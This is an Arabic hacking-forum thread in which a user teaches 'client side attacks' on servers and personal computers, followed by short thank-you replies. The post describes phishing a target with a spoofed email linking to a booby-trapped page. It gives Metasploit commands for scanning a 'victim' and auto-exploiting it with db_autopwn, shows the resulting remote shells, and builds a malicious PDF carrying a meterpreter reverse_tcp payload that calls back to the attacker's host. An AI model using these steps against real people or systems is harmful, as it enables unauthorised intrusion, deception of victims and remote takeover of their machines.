[ شرح ] شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

تم تحميل الصفحة في 0,1381524 ثانية
شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks
الحالة
مغلق و غير مفتوح للمزيد من الردود.

J0ckér-ràt

Beginner Developer
rankrankrank
إنضم
14 أغسطس 2010
المشاركات
708
الإعجابات
142
النقاط
0
بسم الله الرحمن الرحيم
والصلاة والسلام علي أشرف المرسلين محمد إبن عبد الله النبي الأمين
وعلي امته ومن تبعه بإخلاص إلي يوم الدين

-------------------------



كثر الحديث عن إمكانية الإختراق بالايبي فقط . . هل يمكن ذلك او لا ؟


ربما اصبح السؤال متأخر جدا في هذا الوقت لوجود مشاريع الإختراق وكثرتها وجعلها من المصادر المفتوحه


وسندرس اليوم بإن الله جآنب من عمليات الإختراق التي تهدد المستخدم العادي والغير عادي


وأقصد بالمستخدم العادي Personal Computing استخدام الكمبيوتر بشكل شخصي


والمستخدم الغير عادي
أجهزة السرفرات والشركات والمؤسسات ... إلخ

والجانب الذي سندرسه اليوم هو أخطر جوانب عمليات الإختراق التي تهدد المستخدمين


حيث ان تلك العمليه تنجح بها في
إختراق الضحيه بنسبة تعدو الـ 75% .. << لآ يستهان بها طبعا .

Client Side Attacks

و سنقسم موضوع اليوم باذن الله كالتالي :


تعريف بالكلينت سايد أتاكس
1-Client Side Attacks
2
- بعض البرامج التي يمكن استغلالها
3- تطبيق عملي علي أحد الثغرات
------------------
بسم الله نبدأ
ما هي الـ (Client Side Attacks)

أبدا تعريف الكلينت سايد اتاك بنفس التعريف الذي بدأ به Tim Greene عندما شرح الكلينت سايد اتاكس


إقتباسا عن معهد سانس < غني عن التعريف


تلك المقوله المقتبسه عن هي :


كود PHP:
Client-side vulnerabilities are among the biggest threats facing users, the SANS Institute said

ببساطه عندما تريد إختراق ضحيه معينه سواء كان مستخدم عادي او غير عادي كما سبق التفصيل

وبطريقة ما حصلت علي الايبي الشخصي له سواء عن
طريق إيهامه بدخول صفحة لتسجيل بياناته

ا ما شابه ذلك من الطرق . . المهم انت معك الان ايبي ضحيتك


لاكن لا تملك عن جهازه أي معلومات فماذا ستفعل ؟


حسنا أجد البعض يقول Nmap Scanning نفحص الايبي بتاعه بأداة nmap


حسنا وماذا اذا لم تجد بجهازه بورتات خاصه ببرامج مصابه ؟؟ ماذا لو كان ضحيتك أذكي مما تتوقع قام بحجب فحص الإن ماب


حاسس انه في واحد نذل هيقولي نستخدم برنامج فحص تاني غير الان ماب هههههههههه


معاك في دي لاكن فرضا انك لم تجد ايضا برامج مصابه فما الحل ؟


هنا يأتي دور الكلينت سايد اتاكس


وهي تعتمد أكبر الإعتماد علي تحليلك لشخصية الضحيه ويدخل بها أيضا جزء من الهندسه الإجتماعيه


يمعني ؟ بمعني انك تقوم بتخمين برنامج معين يكون الضحيه يستخدمه او يكون البرنامج منتشر علي الكثير من الاجهزه


ما عنيته بتدخل الهندسه الاجتماعيه في ذلك المجال


هو حديثك مع الضحيه ولنفرض انك عرفت بانه مطور مواقع اذا فبحسبه سريعه مطورو المواقع يحتاجون الي :


انترنت اكسبلورر وبعض برامج التصميم وبرنامج مساعد في التعديل علي الملفات وأشهرها notepad++


ومن المعروف انه برنامج النوت باد بلص بلص فيه ثغرات خطيره جدا ومنها ما تدعمه الميتا سبلويت


اذا نستخدم الثغره علي اي بي الضحيه ونحاول اختراقه وهكذا


وإنت وتخمينك


يعني دلوقت الكلينت سايد اتاك هو استهداف برنامج يستخدم بشكل أساسي وإستغلال ثغراته في اختراق الضحيه . .


2 - بعض البرامج التي يمكن استغلالها

طبعا من أشهر البرامج المستخدمه في ألاجهزه


و أشهر المصابين والمتواجدين علي اجهزة المستخدمين بشكل مبالغ فيه وهي internet explorer


notepad++ & gom player & winamp


هل رأيتم ؟ من منا لا يوجد علي جهازه علي ألاقل واحد من تلك لبرامج ؟؟


وغيرها وطبعا لم أذكر سوي البرامج المصابه بثغرات خطيره والتي اقوم بإستخدامها في أغلب الأوقات


وطبعا للحصول علي ثغرات لتلك البرامج من مشروع الميتا سبلويت لا عليكم سوي تشغيل برنامج الميتا سبلويت


ثم كتابة :

كود PHP:
search programN4me

programn4me يعني اسم البرنامج الذي تريد ان تبحث عن ثغره له وناخذ علي سبيل المثال البحث هن ثغره لبرنامج الجوم بلاير



كما ترون بحثنا ووجدنا ثغره خطيره من نوع بفر اوفر فلو يمكن استخدامها واستغلالها ببساطه . .


وتستطيعون البحث أيضا بجوجل عن البرامج التي تتوقعون بأن الضحيه يستخدمها


3 - تطبيق عملي

وعفوا ساشرح تلك النقطه بانجاز نظرا لقلة الوقت . . لاكن ساوضح بعض التفاصيل حتي تفهموني .


بالفعل اكثر الثغرات وأشهرها وللاسف انها موجوده في معظم الاجهزه حتي
أجهزة سرفرات المواقع

هي ثغرات الانترنت اكسبلورر . . . فنجد ان الكثيرين من مستخدمي الانترنت يتصفحونه عن
طريق ذلك العقيم الانترنت اكسبلورر

هل تريدون أن اصرح لكم بسر صغير
<< الهكر الاول في الزون اتش الهكر التركي ايسكربوتكس

يستخدم الانترنت اكسبلورر
وقد رايته بجهازه أثناء تصفحه لاحد الشلات الملغمه ويال الاسي هههههههه

حسنا فلنكمل . . حتي حينما تقوم بتنصيب وندوز جديد تجد عموو اكسبلورر نازل معاه غصب هههههههههه


اكيد طالما تابع لميكروسوفت


انا عن نفسي بمجرد ما انصب الوندوز أروح للبروجرام فايلز واحذفه طوالي [email protected]


تجربة اليوم ستكون علي جهاز سرفر وندوز يعني ليس مستخدم عادي ..


حسنا اذا فهو يستخدم الانترنت اكسبلورر . .


سريعا ودون تضييع للوقت ساستخدم ثغره مصاب بها الانترنت اكسبلورر وهي موجوده في الميتا سبلويت بإسم :


كود PHP:
ie_xml_corrupitaion



حسنا من متطلبات الثغره url يعني رابط كايبي مثلا يكون ايبي ثابت يتم وضع الصفحه الناتجه من الثغره عليه


حتي ترسلها للضحيه وبمجرد دخوله اليها تقوم بإختراقه . . .


وقد استخدمت في ذلك جهاز ريموت ديسك توب لانه ايبي ثابت واقدر اتصل منه علي اي بورت


حسنا الخطوه الاولي في الاستغلال سريعا ابحث في موقع الهدف عن اميله


وجدته . . الخطوه الثانيه استخدم سكربت ميلر حتي اقدر ارسل للضحيه رساله من اي اميل اريده



الخطوه الثالثه تجهيز رساله مخادعه مع رابط لموقع عادي ويكون الهيبر لينك لها هو رابط صفحتي الملغومه .


الخطوه الرابعه أنتظر وقوع الضحيه في الفخ . .





1 2 3 4 . . . فشل في العمليه !! لماذا ؟؟ الضحيه لم يدخل علي الرابط !!
اذا فما الحل ؟؟

وجدتها انا بحثت عن البرامج المصابه عند الضحيه ولم ابحث عن ثغرات للنظام الخاص بالضحيه !!



يمعني انني عندما قمت بفحص جهاز السرفر باداة nmap وجدت معظم البورتات مفلتره


والبورتات المفتوحه ليس لبرامجها ثغرات


لاكني نسيت ان تخمين الان ماب قال بان الضحيه يستخدم نظام وندوز sp1 والتخمين بنسبة 97 في الميه


اذا هنا سيكون اللعب سنقوم بالبحث في الميتا سبلويت عن ثغرات لنظام الوندوز من نوع sp1


وساستخدم اداة


كود PHP:
db_autopwn

حتي أستطيع تجربة اكبر عدد من الثغرات وبشكل اوتوماتيكي

حسنا نقوم بفتح الميتا سبلويت

ثم نقوم بتحميل sqlite3 بالامر :


كود PHP:
load db_sqlite3

ثم نقوم بإنشاء قاعدة بيانات جديده لاستخدامها

كود PHP:
db_create hima

ثم نستخدم الامر db_ ونستعرض الخواص الممكن استخدامها وأهمها هو :

كود PHP:
db_nmap And db_autopwn

إذا نقوم باستخدام اداة الفحص db_nmap لفحص ضحيتنا بالأمر :

كود PHP:
db_nmap 41.24.57.263

طبعا الايبي اللي انا كاتبه فوق هو أيبي وهمي


حسنا إنتهي الفحص والإن :


كود PHP:
db_autopwn -p -e -b

ولنطلق العنان للاوتوبون


بعد تجربة عدة ثغرات وجدت أن لدي 3 sessions
<< طبعا كوماند شل command ****************l

كود PHP:
msf > sessions -l

Active Sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command ****************l xx.xxx.xx.xxx:An Port -> My ip:An Port
2 Command ****************l xx
.xxx.xx.xxx:An Port -> My ip:An Port
3 Command ****************l xx
.xxx.xx.xxx:An Port -> My ip:An Port

msf
> sessions -i 2
[+] Starting interaction with 2..

Microsoft Windows XP [Version 5.1.2600]
(
C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

-------------------------------------------------

هذا تطبيق إخر لثغره اخري علي السريع ربما يفيدكم بإذن الله :


كود PHP:
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit
(adobe_utilprintf) > set FILE**** BestComputers-UpgradeInstructions.pdf
FILE
**** => BestComputers-UpgradeInstructions.pdf
msf exploit
(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD
=> windows/meterpreter/reverse_tcp
msf exploit
(adobe_utilprintf) > set LHOST 192.168.8.128
LHOST
=> 192.168.8.128
msf exploit
(adobe_utilprintf) > set LPORT 4455
LPORT
=> 4455
msf exploit
(adobe_utilprintf) > show options

Module options
:

****
Current Setting Required Description
---- --------------- -------- -----------
FILE**** BestComputers-UpgradeInstructions.pdf yes The file ****.
OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The ******** of the file.


Payload options (windows/meterpreter/reverse_tcp):

****
Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.8.128 yes The local address
LPORT 4455 yes The local port


Exploit target
:

Id ****
-- ----
0 Adobe Reader v8.1.2 (Windows XP SP3 English)

msf > exploit(adobe_utilprintf) > exploit

-----------------------------------------------------

إلي هني ينتهي موضوع اليوم وأرجو أن أكون وفقت في الشرح والتوضيح وآسف علي التقصير


وهذا كان تعريفي وشرحي لهجمات
Client Side Attacks وبعض الطرق المستخدمه في استغلال تلك الهجمات

أما تعريف معهد سانس لذلك النوع من الهجمات فيتلخص في :


كود PHP:
Attackers are going after weaknesses in desktop applications such as browsers, media players, common office applications and e-mail clients

ملحوظه : من لديه المزيد من المعلومات عن ذلك النوع فليتفضل بالطرح والتوضيح حتي تتسع دائرة المعرفه

وبالختام لا يسعني المقام سوي التوجه بالشكر إلي :


Nashy & Dr.aodai & Dr.Mot & MJRM
& عقرب سكاي


وإلي جميع أصدقائي دون إستثناء


ولا أرجو منكم سوي الدعاء لي ولوالداي بما تجود به أنفسكم . وجزاكم الله خيرا .


و الدعااء لي بحسن الخاتمة

و اكيد التقييم ادا كنت استاهل :10:

اللهم إغفر للمسلمين والمسلمات والمؤمنين والمؤمنات الأحياء منهم والأموات


إنك يا ربنا سميع مجيب الدعوات . وصلي الله وسلم علي سيدنا محمد وعلي آله وصحبه أجمعين.




أخوكم Jockèr-ràt

 
إنضم
10 مارس 2011
المشاركات
242
الإعجابات
52
النقاط
0
رد: شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

:32::32::32::32::32:

يعطيك العافية

شرح وآفي
 
إنضم
15 أغسطس 2010
المشاركات
1,070
الإعجابات
94
النقاط
0
رد: شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

مشكور يا بطل

تستاهل التقيم
:15:
واش Dr.poky

هدا و لا لا
 
إنضم
27 أغسطس 2007
المشاركات
221
الإعجابات
12
النقاط
0
رد: شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

:6:شررح رااائع ومن اقوى المواضيع اليوووم تستاهل التقييم فعلا : ) :29:

والميتا سبلويت مليانه ثغراات بالهبل : ) )

بس اسرع شي على الباك تراك ماتعلق مثل الوندز

تم التقييم
 
إنضم
2 سبتمبر 2010
المشاركات
1,321
الإعجابات
179
النقاط
63
رد: شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

مشكوررر أخ خالد
وبارك الله فيك جارى تقيييمك بعد الرد بإذن الله
 

J0ckér-ràt

Beginner Developer
rankrankrank
إنضم
14 أغسطس 2010
المشاركات
708
الإعجابات
142
النقاط
0
رد: شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

يسلمو يا اعضااء الديف بوينت بس المرجو التطوير و التطوير :15:
 

J0ckér-ràt

Beginner Developer
rankrankrank
إنضم
14 أغسطس 2010
المشاركات
708
الإعجابات
142
النقاط
0
رد: شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

تسلم اخي على المروور:8:
 
إنضم
26 ديسمبر 2009
المشاركات
8,093
الإعجابات
951
النقاط
113
رد: شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

يعطيك الف عافيه على هالشرح
بس نسقته اكثر واكثر

كان بيطلع بحله متكامله

:10::32:
 

MR.FonTom

ExpErt DeveloPer
rankrankrankrankrank
إنضم
19 أغسطس 2010
المشاركات
2,352
الإعجابات
57
النقاط
48
رد: شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

:32::32::32::32::32:
 
إنضم
11 مارس 2011
المشاركات
388
الإعجابات
15
النقاط
0
رد: شرح إختراق أجهزة السرفرات والأجهزه العاديه عن طريق Client Side Attacks

5 دقآيق ضآعت من عمري..:24:
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل